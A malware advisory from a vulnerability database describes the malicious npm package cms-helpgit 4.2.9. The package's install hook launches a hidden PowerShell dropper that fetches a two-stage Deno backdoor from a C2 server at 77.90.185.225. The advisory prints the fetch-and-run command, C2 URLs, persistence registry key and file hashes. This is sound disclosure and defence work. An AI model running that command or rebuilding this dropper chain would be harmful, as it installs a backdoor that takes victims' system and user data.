VDB
GCVE-110-OSM-2026-5124
GCVE-110-OSM-2026-5124
Advisory PublishedCVSS 9.6/10
Executes a hidden PowerShell dropper at install time that silently installs the Deno runtime and fetches a two-stage backdoor from attacker-controlled C2 at 77.90.185.225. The stage-2 payload is an obfuscated Deno backdoor that establishes Windows registry persistence (HKCU:\Software\Micro\WinrentVersion\Run), drops C:\Windows\Temp\TATA.js, and beacons hostname and username to the C2 via custom HTTP headers.
**Trigger** (`install`): executes `node install.js` via the npm install lifecycle hook.
**Dropper**: install.js writes a PowerShell script to a randomly-named temp file and spawns it detached with `windowsHide:true` and `child.unref()`.
**Stage-1 fetch**: PowerShell ensures Deno is present (via scoop/winget), then runs `deno run -A http://77.90.185.225/v026a4a141fd9e7d2dd.js` (SHA256: ab6655ab3412adad79371c28182a61d492899c9cb1553d8dd3d5eeb989c60a17, 307 bytes). Stage-1 is a polling loader that fetches http://77.90.185.225/v26a4a141fd9e7d2dd.js in an infinite retry loop (5s retry, 30s interval) and evals the response.
**Stage-2 execution**: fetched payload is an obfuscated Deno backdoor (16,397 bytes, SHA256: eeb3e1fdf19f966931ad3986b34ed220095972c2c5287351a00521be22935119). It beacons to `/healthtjIF` and `/mesredu` on the C2, establishes registry persistence at `HKCU:\Software\Micro\WinrentVersion\Run`, drops payload to `C:\Windows\Temp\TATA.js`, and transmits `x-hostname` and `x-username` headers with a hardcoded Bearer JWT for C2 authentication.
**Data collected**: system hostname, `process.env.USER`, `process.env.TEMP`, `process.env.TMP`.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | cms-helpgit | 4.2.9 (affected) | — |
Browse GCVE Records
73,161 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.